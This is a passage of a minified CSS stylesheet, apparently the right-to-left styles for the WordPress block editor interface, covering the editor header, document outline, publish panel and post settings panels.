(min-width:782px){.editor-document-bar__shortcut{display:initial}}.editor-document-bar__back.components-button.has-icon.has-text{color:#757575;flex-shrink:0;gap:0;min-width:36px;position:absolute;z-index:1}.editor-document-bar__back.components-button.has-icon.has-text:hover{background-color:initial;color:#1e1e1e}.editor-document-bar__icon-layout.editor-document-bar__icon-layout{display:none;margin-right:12px;pointer-events:none;position:absolute}.editor-document-bar__icon-layout.editor-document-bar__icon-layout svg{fill:#949494}@media (min-width:600px){.editor-document-bar__icon-layout.editor-document-bar__icon-layout{display:flex}}.document-outline{margin:20px 0}.document-outline ul{margin:0;padding:0}.document-outline__item{display:flex;margin:4px 0}.document-outline__item a{text-decoration:none}.document-outline__item .document-outline__emdash:before{color:#ddd;margin-left:4px}.document-outline__item.is-h2 .document-outline__emdash:before{content:"—"}.document-outline__item.is-h3 .document-outline__emdash:before{content:"——"}.document-outline__item.is-h4 .document-outline__emdash:before{content:"———"}.document-outline__item.is-h5 .document-outline__emdash:before{content:"————"}.document-outline__item.is-h6 .document-outline__emdash:before{content:"—————"}.document-outline__button{align-items:flex-start;background:none;border:none;border-radius:2px;color:#1e1e1e;cursor:pointer;display:flex;margin:0 -1px 0 0;padding:2px 1px 2px 5px;text-align:right}.document-outline__button:disabled,.document-outline__button[aria-disabled=true]{color:#757575;cursor:default}.document-outline__button:focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:2px solid #0000}.document-outline__level{background:#ddd;border-radius:3px;color:#1e1e1e;font-size:13px;margin-left:4px;padding:1px 6px}.is-invalid .document-outline__level{background:#f0b849}.document-outline__item-content{padding:1px 0}.editor-document-outline.has-no-headings>svg{margin-top:28px}.editor-document-outline.has-no-headings>p{padding-left:32px;padding-right:32px}.editor-document-outline.has-no-headings{color:#757575;text-align:center}.editor-document-tools{align-items:center;display:inline-flex}.editor-document-tools .editor-document-tools__left>.editor-history__redo,.editor-document-tools .editor-document-tools__left>.editor-history__undo{display:none}@media (min-width:782px){.editor-document-tools .editor-document-tools__left>.editor-history__redo,.editor-document-tools .editor-document-tools__left>.editor-history__undo{display:inline-flex}}.editor-document-tools .editor-document-tools__left>.editor-document-tools__inserter-toggle{display:inline-flex}@media not (prefers-reduced-motion){.editor-document-tools .editor-document-tools__left>.editor-document-tools__inserter-toggle svg{transition:transform .2s cubic-bezier(.165,.84,.44,1)}}.editor-document-tools .editor-document-tools__left>.editor-document-tools__inserter-toggle.is-pressed svg{transform:rotate(-45deg)}.editor-document-tools .block-editor-list-view{display:none}@media (min-width:600px){.editor-document-tools .block-editor-list-view{display:flex}}.editor-document-tools .editor-document-tools__left>.components-button.has-icon,.editor-document-tools .editor-document-tools__left>.components-dropdown>.components-button.has-icon{height:32px;min-width:32px;padding:4px}.editor-document-tools .editor-document-tools__left>.components-button.has-icon.is-pressed,.editor-document-tools .editor-document-tools__left>.components-dropdown>.components-button.has-icon.is-pressed{background:#1e1e1e}.editor-document-tools .editor-document-tools__left>.components-button.has-icon:focus:not(:disabled),.editor-document-tools .editor-document-tools__left>.components-dropdown>.components-button.has-icon:focus:not(:disabled){box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color),inset 0 0 0 1px #fff;outline:1px solid #0000}.editor-document-tools .editor-document-tools__left>.components-button.has-icon:before,.editor-document-tools .editor-document-tools__left>.components-dropdown>.components-button.has-icon:before{display:none}.editor-document-tools__left{align-items:center;display:inline-flex;gap:8px}.editor-document-tools__left:not(:last-child){margin-inline-end:8px}.show-icon-labels .editor-document-tools .editor-document-tools__left>.editor-document-tools__inserter-toggle.has-icon{padding:0 8px;width:auto}.show-icon-labels .editor-document-tools__left>*+*{margin-right:8px}.editor-editor-interface .entities-saved-states__panel-header{height:65px}.editor-editor-interface .interface-interface-skeleton__content{isolation:isolate}.editor-visual-editor{flex:1 0 auto}.components-editor-notices__dismissible,.components-editor-notices__pinned{color:#1e1e1e;left:0;position:relative;right:0;top:0}.components-editor-notices__dismissible .components-notice,.components-editor-notices__pinned .components-notice{border-bottom:1px solid #0003;box-sizing:border-box;min-height:64px;padding:0 12px}.components-editor-notices__dismissible .components-notice .components-notice__dismiss,.components-editor-notices__pinned .components-notice .components-notice__dismiss{margin-top:12px}.entities-saved-states__panel-header{background:#fff;border-bottom:1px solid #ddd;box-sizing:border-box;height:64px;padding-left:16px;padding-right:16px}.entities-saved-states__text-prompt{padding:16px 16px 4px}.entities-saved-states__text-prompt .entities-saved-states__text-prompt--header{display:block;margin-bottom:12px}.entities-saved-states__panel.is-inline .entities-saved-states__text-prompt{padding:0}.entities-saved-states__panel.is-inline .entities-saved-states__panel-body{border:0;padding-left:0;padding-right:0}.entities-saved-states__panel.is-inline .entities-saved-states__panel-body>h2{margin-bottom:0;margin-left:-16px;margin-right:-16px}.entities-saved-states__panel.is-inline .entities-saved-states__panel-body>h2 button{font-size:11px;text-transform:uppercase}.entities-saved-states__panel.is-inline .entities-saved-states__text-prompt--header-wrapper{display:none}.entities-saved-states__panel.is-inline .entities-saved-states__text-prompt--changes-count{margin-bottom:8px;margin-top:0}.entities-saved-states__panel.is-inline .entities-saved-states__panel-footer{margin-top:16px}.entities-saved-states__change-control{flex:1}.entities-saved-states__changes{font-size:13px;list-style:disc;margin:4px 24px 0 16px}.entities-saved-states__changes li{margin-bottom:4px}.editor-error-boundary{background-color:#fff;border:1px solid #1e1e1e;border-radius:2px;box-shadow:0 5px 15px #00000014,0 15px 27px #00000012,0 30px 36px #0000000a,0 50px 43px #00000005;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;margin:64px auto auto;max-width:780px;padding:1em}.editor-header{box-sizing:border-box}.editor-header *,.editor-header :after,.editor-header :before{box-sizing:inherit}.editor-header{background:#fff;display:grid;grid-auto-flow:row;grid-template:auto/64px minmax(0,max-content) minmax(min-content,1fr) 64px;height:64px}.editor-header:has(>.editor-header__center){grid-template:auto/64px min-content 1fr min-content 64px}@media (min-width:782px){.editor-header:has(>.editor-header__center){grid-template:auto/64px minmax(min-content,2fr) 2.5fr minmax(min-content,2fr) 64px}}@media (min-width:480px){.editor-header{gap:16px}}.editor-header{align-items:center;justify-content:space-between;max-width:100vw}@media (min-width:280px){.editor-header{flex-wrap:nowrap}}.editor-header__toolbar{grid-column:1/3}.editor-header__toolbar>:first-child{margin-inline:16px 0}.editor-header__back-button+.editor-header__toolbar{grid-column:2/3}@media (min-width:480px){.editor-header__back-button+.editor-header__toolbar>:first-child{margin-inline:0}}.editor-header__toolbar{align-items:center;clip-path:inset(-2px);display:flex;min-width:0}@media (min-width:480px){.editor-header__toolbar{clip-path:none}}.editor-header__toolbar .table-of-contents{display:none}@media (min-width:600px){.editor-header__toolbar .table-of-contents{display:block}}.editor-header__toolbar .editor-collapsible-block-toolbar,.editor-header__toolbar .editor-collapsible-block-toolbar.is-collapsed~.editor-collapsible-block-toolbar__toggle{margin-inline:8px 0}.editor-header__center{align-items:center;clip-path:inset(-2px);display:flex;grid-column:3/4;justify-content:center;min-width:0}@media (max-width:479px){.editor-header__center>:first-child{margin-inline-start:8px}.editor-header__center>:last-child{margin-inline-end:8px}}.editor-header__settings{grid-column:3/-1}.editor-header:has(>.editor-header__center) .editor-header__settings{grid-column:4/-1}.editor-header__settings{align-items:center;display:inline-flex;flex-wrap:nowrap;justify-self:end;padding-left:4px}@media (min-width:600px){.editor-header__settings{padding-left:8px}}.editor-header__settings{gap:8px}.show-icon-labels .editor-header .components-button.has-icon,.show-icon-labels.interface-pinned-items .components-button.has-icon{width:auto}.show-icon-labels .editor-header .components-button.has-icon svg,.show-icon-labels.interface-pinned-items .components-button.has-icon svg{display:none}.show-icon-labels .editor-header .components-button.has-icon:after,.show-icon-labels.interface-pinned-items .components-button.has-icon:after{content:attr(aria-label);white-space:nowrap}.show-icon-labels .editor-header .components-button.has-icon[aria-disabled=true],.show-icon-labels.interface-pinned-items .components-button.has-icon[aria-disabled=true]{background-color:initial}.show-icon-labels .editor-header .is-tertiary:active,.show-icon-labels.interface-pinned-items .is-tertiary:active{background-color:initial;box-shadow:0 0 0 1.5px var(--wp-admin-theme-color)}.show-icon-labels .editor-header .components-button.has-icon.button-toggle svg,.show-icon-labels.interface-pinned-items .components-button.has-icon.button-toggle svg{display:block}.show-icon-labels .editor-header .components-button.has-icon.button-toggle:after,.show-icon-labels.interface-pinned-items .components-button.has-icon.button-toggle:after{content:none}.show-icon-labels .editor-header .components-menu-items-choice .components-menu-items__item-icon.components-menu-items__item-icon,.show-icon-labels.interface-pinned-items .components-menu-items-choice .components-menu-items__item-icon.components-menu-items__item-icon{display:block}.show-icon-labels .editor-header .editor-document-tools__inserter-toggle.editor-document-tools__inserter-toggle,.show-icon-labels .editor-header .interface-pinned-items .components-button,.show-icon-labels.interface-pinned-items .editor-document-tools__inserter-toggle.editor-document-tools__inserter-toggle,.show-icon-labels.interface-pinned-items .interface-pinned-items .components-button{padding-left:8px;padding-right:8px}@media (min-width:600px){.show-icon-labels .editor-header .editor-document-tools__inserter-toggle.editor-document-tools__inserter-toggle,.show-icon-labels .editor-header .interface-pinned-items .components-button,.show-icon-labels.interface-pinned-items .editor-document-tools__inserter-toggle.editor-document-tools__inserter-toggle,.show-icon-labels.interface-pinned-items .interface-pinned-items .components-button{padding-left:12px;padding-right:12px}}.show-icon-labels .editor-header .editor-post-save-draft.editor-post-save-draft:after,.show-icon-labels .editor-header .editor-post-saved-state.editor-post-saved-state:after,.show-icon-labels.interface-pinned-items .editor-post-save-draft.editor-post-save-draft:after,.show-icon-labels.interface-pinned-items .editor-post-saved-state.editor-post-saved-state:after{content:none}.show-icon-labels .editor-header__toolbar .block-editor-block-mover{border-right:none}.show-icon-labels .editor-header__toolbar .block-editor-block-mover:before{background-color:#ddd;content:"";height:24px;margin-right:8px;margin-top:4px;width:1px}.show-icon-labels .editor-header__toolbar .block-editor-block-mover .block-editor-block-mover__move-button-container:before{background:#ddd;right:calc(50% + 1px);width:calc(100% - 24px)}.show-icon-labels.interface-pinned-items{border-bottom:1px solid #ccc;display:block;margin:0 -12px;padding:6px 12px 12px}.show-icon-labels.interface-pinned-items>.components-button.has-icon{justify-content:flex-start;margin:0;padding:6px 8px 6px 6px;width:14.625rem}.show-icon-labels.interface-pinned-items>.components-button.has-icon[aria-expanded=true] svg{display:block;max-width:24px}.show-icon-labels.interface-pinned-items>.components-button.has-icon[aria-expanded=false]{padding-right:40px}.show-icon-labels.interface-pinned-items>.components-button.has-icon svg{margin-left:8px}@media (min-width:480px){.editor-header__post-preview-button{display:none}}.editor-editor-interface.is-distraction-free .interface-interface-skeleton__header{border-bottom:none}.editor-editor-interface.is-distraction-free .editor-header{background-color:#fff;width:100%}@media (min-width:782px){.editor-editor-interface.is-distraction-free .editor-header{box-shadow:0 1px 0 0 rgba(0,0,0,.133);position:absolute}}.editor-editor-interface.is-distraction-free .editor-header>.edit-post-header__settings>.edit-post-header__post-preview-button{visibility:hidden}.editor-editor-interface.is-distraction-free .editor-header>.editor-header__settings>.editor-preview-dropdown,.editor-editor-interface.is-distraction-free .editor-header>.editor-header__settings>.editor-zoom-out-toggle,.editor-editor-interface.is-distraction-free .editor-header>.editor-header__settings>.interface-pinned-items,.editor-editor-interface.is-distraction-free .editor-header>.editor-header__toolbar .editor-document-tools__document-overview-toggle{display:none}.editor-editor-interface.is-distraction-free .interface-interface-skeleton__header:focus-within{opacity:1!important}.editor-editor-interface.is-distraction-free .interface-interface-skeleton__header:focus-within div{transform:translateX(0) translateZ(0)!important}.editor-editor-interface.is-distraction-free .components-editor-notices__dismissible{position:absolute;z-index:35}.components-popover.more-menu-dropdown__content{z-index:99998}.editor-inserter-sidebar{box-sizing:border-box}.editor-inserter-sidebar *,.editor-inserter-sidebar :after,.editor-inserter-sidebar :before{box-sizing:inherit}.editor-inserter-sidebar{display:flex;flex-direction:column;height:100%}.editor-inserter-sidebar__content{height:100%}.editor-keyboard-shortcut-help-modal__section{margin:0 0 2rem}.editor-keyboard-shortcut-help-modal__section-title{font-size:.9rem;font-weight:600}.editor-keyboard-shortcut-help-modal__shortcut{align-items:baseline;border-top:1px solid #ddd;display:flex;margin-bottom:0;padding:.6rem 0}.editor-keyboard-shortcut-help-modal__shortcut:last-child{border-bottom:1px solid #ddd}.editor-keyboard-shortcut-help-modal__shortcut:empty{display:none}.editor-keyboard-shortcut-help-modal__shortcut-term{font-weight:600;margin:0 1rem 0 0;text-align:left}.editor-keyboard-shortcut-help-modal__shortcut-description{flex:1;margin:0}.editor-keyboard-shortcut-help-modal__shortcut-key-combination{background:none;display:block;margin:0;padding:0}.editor-keyboard-shortcut-help-modal__shortcut-key-combination+.editor-keyboard-shortcut-help-modal__shortcut-key-combination{margin-top:10px}.editor-keyboard-shortcut-help-modal__shortcut-key{border-radius:8%;margin:0 .2rem;padding:.25rem .5rem}.editor-keyboard-shortcut-help-modal__shortcut-key:last-child{margin:0 .2rem 0 0}.editor-list-view-sidebar{height:100%}@media (min-width:782px){.editor-list-view-sidebar{width:350px}}.editor-list-view-sidebar__list-view-container>.document-outline,.editor-list-view-sidebar__list-view-panel-content{height:100%}.editor-list-view-sidebar__list-view-container>.document-outline::-webkit-scrollbar,.editor-list-view-sidebar__list-view-panel-content::-webkit-scrollbar{height:12px;width:12px}.editor-list-view-sidebar__list-view-container>.document-outline::-webkit-scrollbar-track,.editor-list-view-sidebar__list-view-panel-content::-webkit-scrollbar-track{background-color:initial}.editor-list-view-sidebar__list-view-container>.document-outline::-webkit-scrollbar-thumb,.editor-list-view-sidebar__list-view-panel-content::-webkit-scrollbar-thumb{background-clip:padding-box;background-color:initial;border:3px solid #0000;border-radius:8px}.editor-list-view-sidebar__list-view-container>.document-outline:focus-within::-webkit-scrollbar-thumb,.editor-list-view-sidebar__list-view-container>.document-outline:focus::-webkit-scrollbar-thumb,.editor-list-view-sidebar__list-view-container>.document-outline:hover::-webkit-scrollbar-thumb,.editor-list-view-sidebar__list-view-panel-content:focus-within::-webkit-scrollbar-thumb,.editor-list-view-sidebar__list-view-panel-content:focus::-webkit-scrollbar-thumb,.editor-list-view-sidebar__list-view-panel-content:hover::-webkit-scrollbar-thumb{background-color:#949494}.editor-list-view-sidebar__list-view-container>.document-outline,.editor-list-view-sidebar__list-view-panel-content{scrollbar-color:#0000 #0000;scrollbar-gutter:stable both-edges;scrollbar-width:thin}.editor-list-view-sidebar__list-view-container>.document-outline:focus,.editor-list-view-sidebar__list-view-container>.document-outline:focus-within,.editor-list-view-sidebar__list-view-container>.document-outline:hover,.editor-list-view-sidebar__list-view-panel-content:focus,.editor-list-view-sidebar__list-view-panel-content:focus-within,.editor-list-view-sidebar__list-view-panel-content:hover{scrollbar-color:#949494 #0000}.editor-list-view-sidebar__list-view-container>.document-outline,.editor-list-view-sidebar__list-view-panel-content{will-change:transform}@media (hover:none){.editor-list-view-sidebar__list-view-container>.document-outline,.editor-list-view-sidebar__list-view-panel-content{scrollbar-color:#949494 #0000}}.editor-list-view-sidebar__list-view-container>.document-outline,.editor-list-view-sidebar__list-view-panel-content{overflow:auto;padding:4px;scrollbar-gutter:auto}.editor-list-view-sidebar__list-view-container{display:flex;flex-direction:column;height:100%}.editor-list-view-sidebar__tab-panel{height:100%}.editor-list-view-sidebar__outline{border-bottom:1px solid #ddd;display:flex;flex-direction:column;gap:8px;padding:16px}.editor-list-view-sidebar__outline>div>span:first-child{display:inline-block;width:90px}.editor-list-view-sidebar__outline>div>span{color:#757575;font-size:12px;line-height:1.4}.editor-post-order__panel,.editor-post-parent__panel{padding-top:8px}.editor-post-order__panel .editor-post-panel__row-control>div,.editor-post-parent__panel .editor-post-panel__row-control>div{width:100%}.editor-post-order__panel-dialog .editor-post-order,.editor-post-order__panel-dialog .editor-post-parent,.editor-post-parent__panel-dialog .editor-post-order,.editor-post-parent__panel-dialog .editor-post-parent{margin:8px}.editor-post-order__panel-dialog .components-popover__content,.editor-post-parent__panel-dialog .components-popover__content{min-width:320px}.editor-post-author__panel{padding-top:8px}.editor-post-author__panel .editor-post-panel__row-control>div{width:100%}.editor-post-author__panel-dialog .editor-post-author{margin:8px;min-width:248px}.editor-action-modal{z-index:1000001}.editor-post-card-panel__content{flex-grow:1}.editor-post-card-panel__title{width:100%}.editor-post-card-panel__title.editor-post-card-panel__title{align-items:center;column-gap:8px;display:flex;flex-wrap:wrap;font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:500;line-height:20px;margin:0;row-gap:4px;word-break:break-word}.editor-post-card-panel__icon{flex:0 0 24px;height:24px;width:24px}.editor-post-card-panel__header{display:flex;justify-content:space-between}.editor-post-card-panel.has-description .editor-post-card-panel__header{margin-bottom:8px}.editor-post-card-panel .editor-post-card-panel__title-name{padding:2px 0}.editor-post-card-panel .editor-post-card-panel__description,.editor-post-content-information{color:#757575}.editor-post-content-information .components-text{color:inherit}.editor-post-discussion__panel-dialog .editor-post-discussion{margin:8px;min-width:248px}.editor-post-discussion__panel-toggle .components-text{color:inherit}.editor-post-discussion__panel-dialog .components-popover__content{min-width:320px}.editor-post-excerpt__textarea{margin-bottom:10px;width:100%}.editor-post-excerpt__dropdown__content .components-popover__content{min-width:320px;padding:16px}.editor-post-featured-image{padding:0}.editor-post-featured-image .hidden{display:none}.editor-post-featured-image .components-spinner{margin-right:-9px;margin-top:-9px;position:absolute;right:50%;top:50%}.editor-post-featured-image__container{position:relative}.editor-post-featured-image__container:focus .editor-post-featured-image__actions:not(.editor-post-featured-image__actions-is-requesting-image),.editor-post-featured-image__container:focus-within .editor-post-featured-image__actions:not(.editor-post-featured-image__actions-is-requesting-image),.editor-post-featured-image__container:hover .editor-post-featured-image__actions:not(.editor-post-featured-image__actions-is-requesting-image){opacity:1}.editor-post-featured-image__container .editor-post-featured-image__actions.editor-post-featured-image__actions-missing-image{margin-top:16px;opacity:1}.editor-post-featured-image__container .components-drop-zone__content{border-radius:2px}.editor-post-featured-image__container:has(.editor-post-featured-image__toggle) .components-drop-zone .components-drop-zone__content-inner{align-items:center;display:flex;gap:8px}.editor-post-featured-image__container:has(.editor-post-featured-image__toggle) .components-drop-zone .components-drop-zone__content-inner .components-drop-zone__content-icon{margin:0}.editor-post-featured-image__preview,.editor-post-featured-image__toggle{box-shadow:0 0 0 0 var(--wp-admin-theme-color);display:flex;justify-content:center;min-height:40px;outline-offset:-1px;overflow:hidden;padding:0;width:100%}.editor-post-featured-image__preview{height:auto!important;outline:1px solid #0000001a}.editor-post-featured-image__preview .editor-post-featured-image__preview-image{aspect-ratio:2/1;object-fit:cover;object-position:50% 50%;width:100%}.editor-post-featured-image__toggle{box-shadow:inset 0 0 0 1px #ccc}.editor-post-featured-image__toggle:focus:not(:disabled){box-shadow:0 0 0 currentColor inset,0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.editor-post-featured-image__actions:not(.editor-post-featured-image__actions-missing-image){bottom:0;opacity:0;padding:8px;position:absolute}@media not (prefers-reduced-motion){.editor-post-featured-image__actions:not(.editor-post-featured-image__actions-missing-image){transition:opacity 50ms ease-out}}.editor-post-featured-image__actions:not(.editor-post-featured-image__actions-missing-image) .editor-post-featured-image__action{backdrop-filter:blur(16px) saturate(180%);background:#ffffffbf}.editor-post-featured-image__actions .editor-post-featured-image__action{flex-grow:1;justify-content:center}[class].editor-post-format__suggestion{margin:4px 0 0}.editor-post-format__dialog .editor-post-format__dialog-content{margin:8px;min-width:248px}.editor-post-last-edited-panel{color:#757575}.editor-post-last-edited-panel .components-text{color:inherit}.editor-post-last-revision__title{font-weight:500;width:100%}.editor-post-last-revision__title.components-button.has-icon{height:100%;justify-content:space-between}.editor-post-last-revision__title.components-button.has-icon:active,.editor-post-last-revision__title.components-button.has-icon:hover{background:#f0f0f0}.editor-post-last-revision__title.components-button.has-icon:focus{border-radius:0;box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.components-panel__body.is-opened.editor-post-last-revision__panel{height:48px;padding:0}.components-panel__body.is-opened.editor-post-last-revision__panel .editor-post-last-revision__title.components-button.components-button{padding:16px}.editor-private-post-last-revision__button{display:inline-block}.editor-post-locked-modal__buttons{margin-top:24px}.editor-post-locked-modal__avatar{border-radius:50%;margin-top:16px;min-width:auto!important}.editor-post-panel__row{align-items:flex-start!important;justify-content:flex-start!important;min-height:32px;width:100%}.editor-post-panel__row-label{align-items:center;display:flex;flex-shrink:0;hyphens:auto;line-height:20px;min-height:32px;padding:6px 0;width:38%}.editor-post-panel__row-control{align-items:center;display:flex;flex-grow:1;min-height:32px}.editor-post-panel__row-control .components-button{height:auto;max-width:100%;min-height:32px;text-align:right;text-wrap:balance;text-wrap:pretty;white-space:normal}.editor-post-panel__row-control .components-dropdown{max-width:100%}.editor-post-panel__section{padding:16px}.editor-post-publish-panel__content{min-height:calc(100% - 148px)}.editor-post-publish-panel__content>.components-spinner{display:block;margin:100px auto 0}.editor-post-publish-panel__header{align-content:space-between;align-items:center;background:#fff;border-bottom:1px solid #ddd;display:flex;height:65px;padding-left:16px;padding-right:16px}.editor-post-publish-panel__header .components-button{justify-content:center;width:100%}.editor-post-publish-panel__header .has-icon{margin-right:auto;width:auto}.components-site-card{align-items:center;display:flex;margin:16px 0}.components-site-icon{border:none;border-radius:2px;flex-shrink:0;height:36px;margin-left:12px;width:36px}.components-site-name{display:block;font-size:14px}.components-site-home{color:#757575;display:block;font-size:12px;word-break:break-word}.editor-post-publish-panel__header-cancel-button,.editor-post-publish-panel__header-publish-button{flex:1}@media (min-width:480px){.editor-post-publish-panel__header-cancel-button,.editor-post-publish-panel__header-publish-button{max-width:160px}}.editor-post-publish-panel__header-publish-button{justify-content:center;padding-right:4px}.editor-post-publish-panel__header-cancel-button{padding-left:4px}.editor-post-publish-panel__header-published{flex-grow:1}.editor-post-publish-panel__footer{padding:16px}.components-button.editor-post-publish-panel__toggle.is-primary{align-items:center;display:inline-flex}.components-button.editor-post-publish-panel__toggle.is-primary.is-busy .dashicon{display:none}.components-button.editor-post-publish-panel__toggle.is-primary .dashicon{margin-left:-4px}.editor-post-publish-panel__link{font-weight:400;padding-right:4px}.editor-post-publish-panel__prepublish{padding:16px}.editor-post-publish-panel__prepublish strong{color:#1e1e1e}.editor-post-publish-panel__prepublish .components-panel__body{background:#fff;margin-left:-16px;margin-right:-16px}.editor-post-publish-panel__prepublish .editor-post-visibility__dialog-legend{display:none}.editor-post-publish-panel__prepublish .components-panel__body-title .components-button{align-items:flex-start;text-wrap:balance;text-wrap:pretty}.post-publish-panel__postpublish .components-panel__body{border-bottom:1px solid #e0e0e0;border-top:none;word-break:break-word}.post-publish-panel__postpublish-buttons{align-content:space-between;display:flex;flex-wrap:wrap;gap:16px}.post-publish-panel__postpublish-buttons .components-button,.post-publish-panel__postpublish-buttons .components-button.has-icon{flex:1;justify-content:center;min-width:unset}.post-publish-panel__postpublish-buttons .components-clipboard-button{width:100%}.post-publish-panel__postpublish-post-address-container{align-items:flex-end;display:flex;margin-bottom:16px}.post-publish-panel__postpublish-post-address-container .post-publish-panel__postpublish-post-address{flex:1}.post-publish-panel__postpublish-post-address-container input[readonly]{background:#f0f0f0;border-color:#ccc;height:36px;overflow:hidden;padding:12px;text-overflow:ellipsis}.post-publish-panel__postpublish-post-address__copy-button-wrap{flex-shrink:0;margin-right:16px}.post-publish-panel__postpublish-header{font-weight:500}.post-publish-panel__postpublish-subheader{margin:0 0 8px}.post-publish-panel__tip{color:#f0b849}@media screen and (max-width:782px){.post-publish-panel__postpublish-post-address__button-wrap .components-button{height:40px}}.editor-post-publish-panel{box-sizing:border-box}.editor-post-publish-panel *,.editor-post-publish-panel :after,.editor-post-publish-panel :before{box-sizing:inherit}.editor-post-publish-panel{background:#fff;bottom:0;left:0;overflow:auto;position:fixed;right:0;top:46px;z-index:100001}@media (min-width:782px){.editor-post-publish-panel{border-right:1px solid #ddd;right:auto;top:32px;width:281px;z-index:99998}}@media (min-width:782px) and (not (prefers-reduced-motion)){.editor-post-publish-panel{animation:editor-post-publish-panel__slide-in-animation .1s forwards;transform:translateX(-100%)}}@media (min-width:782px){body.is-fullscreen-mode .editor-post-publish-panel{top:0}[role=region]:focus .editor-post-publish-panel{transform:translateX(0)}}@keyframes editor-post-publish-panel__slide-in-animation{to{transform:translateX(0)}}.editor-post-saved-state{align-items:center;color:#757575;display:flex;overflow:hidden;padding:12px 4px;white-space:nowrap;width:28px}.editor-post-saved-state.is-saved[aria-disabled=true],.editor-post-saved-state.is-saved[aria-disabled=true]:hover,.editor-post-saved-state.is-saving[aria-disabled=true],.editor-post-saved-state.is-saving[aria-disabled=true]:hover{background:#0000;color:#757575}.editor-post-saved-state svg{display:inline-block;flex:0 0 auto;fill:currentColor;margin-left:8px}@media (min-width:600px){.editor-post-saved-state{padding:8px 12px;text-indent:inherit;width:auto}.editor-post-saved-state svg{margin-left:0}}.editor-post-save-draft.has-text.has-icon svg{margin-left:0}.editor-post-schedule__panel-dropdown{width:100%}.editor-post-schedule__dialog .components-popover__content{min-width:320px;padding:16px}.editor-post-status{max-width:100%}.editor-post-status.is-read-only{padding:6px 12px}.editor-post-status .editor-post-status__toggle.editor-post-status__toggle{padding-bottom:4px;padding-top:4px}.editor-change-status__password-fieldset,.editor-change-status__publish-date-wrapper{border-top:1px solid #e0e0e0;padding-top:16px}.editor-change-status__content .components-popover__content{min-width:320px;padding:16px}.editor-change-status__content .editor-change-status__password-legend{margin-bottom:8px;padding:0}.editor-change-status__content p.components-base-control__help:has(.components-checkbox-control__help){margin-top:4px}.editor-post-sticky__checkbox-control{border-top:1px solid #e0e0e0;padding-top:16px}.editor-post-sync-status__value{padding:6px 12px 6px 0}.editor-post-taxonomies__hierarchical-terms-list{margin-right:-6px;margin-top:-6px;max-height:14em;overflow:auto;padding-right:6px;padding-top:6px}.editor-post-taxonomies__hierarchical-terms-choice{margin-bottom:8px}.editor-post-taxonomies__hierarchical-terms-choice:last-child{margin-bottom:4px}.editor-post-taxonomies__hierarchical-terms-subchoices{margin-right:16px;margin-top:8px}.editor-post-taxonomies__flat-term-most-used .editor-post-taxonomies__flat-term-most-used-label{margin-bottom:4px}.editor-post-taxonomies__flat-term-most-used-list{margin:0}.editor-post-taxonomies__flat-term-most-used-list li{display:inline-block;margin-left:8px}.editor-post-template__swap-template-modal{z-index:1000001}.editor-post-template__swap-template-modal .editor-post-template__swap-template-search{background:#fff;margin-bottom:-4px;padding:16px 0;position:sticky;top:0;transform:translateY(-4px);z-index:2}.editor-post-template__create-template-modal{z-index:1000001}.editor-post-template__swap-template-modal-content .block-editor-block-patterns-list{column-count:2;column-gap:24px;padding-top:2px}@media (min-width:782px){.editor-post-template__swap-template-modal-content .block-editor-block-patterns-list{column-count:3}}@media (min-width:1280px){.editor-post-template__swap-template-modal-content .block-editor-block-patterns-list{column-count:4}}.editor-post-template__swap-template-modal-content .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{break-inside:avoid-column}.editor-post-template__dropdown .components-popover__content{min-width:240px}.editor-post-template__dropdown .components-button.is-pressed,.editor-post-template__dropdown .components-button.is-pressed:hover{background:inherit;color:inherit}@media (min-width:782px){.editor-post-template__create-form{width:320px}}.editor-post-template__classic-theme-dropdown{padding:8px}textarea.editor-post-text-editor{border:1px solid #949494;border-radius:0;box-shadow:none;display:block;font-family:Menlo,Consolas,monaco,monospace;line-height:2.4;margin:0;min-height:200px;overflow:hidden;resize:none;width:100%}@media not (prefers-reduced-motion){textarea.editor-post-text-editor{transition:border .1s ease-out,box-shadow .1s linear}}textarea.editor-post-text-editor{padding:16px}@media (min-width:600px){textarea.editor-post-text-editor{padding:24px}}textarea.editor-post-text-editor{font-size:16px!important}@media (min-width:600px){textarea.editor-post-text-editor{font-size:15px!important}}textarea.editor-post-text-editor:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);position:relative}textarea.editor-post-text-editor::-webkit-input-placeholder{color:#1e1e1e9e}textarea.editor-post-text-editor::-moz-placeholder{color:#1e1e1e9e}textarea.editor-post-text-editor:-ms-input-placeholder{color:#1e1e1e9e}.editor-post-title.is-raw-text{margin-bottom:24px;margin-top:2px;max-width:none}.editor-post-url__panel-dropdown{width:100%}.editor-post-url__panel-dialog .editor-post-url{margin:8px;min-width:248px}.editor-post-url__front-page-link,.editor-post-url__link{direction:ltr;word-break:break-word}.editor-post-url__front-page-link{border-radius:2px;color:var(--wp-admin-theme-color);padding:6px 12px}.editor-post-url__front-page-link:hover{background:color-mix(in srgb,var(--wp-admin-theme-color) 4%,#0000);color:var(--wp-admin-theme-color-darker-20,#183ad6)}.editor-post-url__front-page-link:focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);color:var(--wp-admin-theme-color);outline:3px solid #0000}.editor-post-url__link-slug{font-weight:600}.editor-post-url__input input.components-input-control__input{padding-inline-start:0!important}.editor-post-parent__panel-toggle,.editor-post-url__panel-toggle{word-break:break-word}.editor-post-url__intro{margin:0}.editor-post-url__permalink{margin-bottom:0;margin-top:8px}.editor-post-url__permalink-visual-label{display:block}.editor-posts-per-page-dropdown__content .components-popover__content{min-width:320px;padding:16px}.editor-post-trash.components-button{flex-grow:1;justify-content:center}.editor-preview-dropdown .editor-preview-dropdown__toggle.has-icon.has-text{padding-left:4px;padding-right:6px}.editor-preview-dropdown__button-external{display:flex;justify-content:space-between;width:100%}.editor-resizable-editor.is-resizable{margin:0 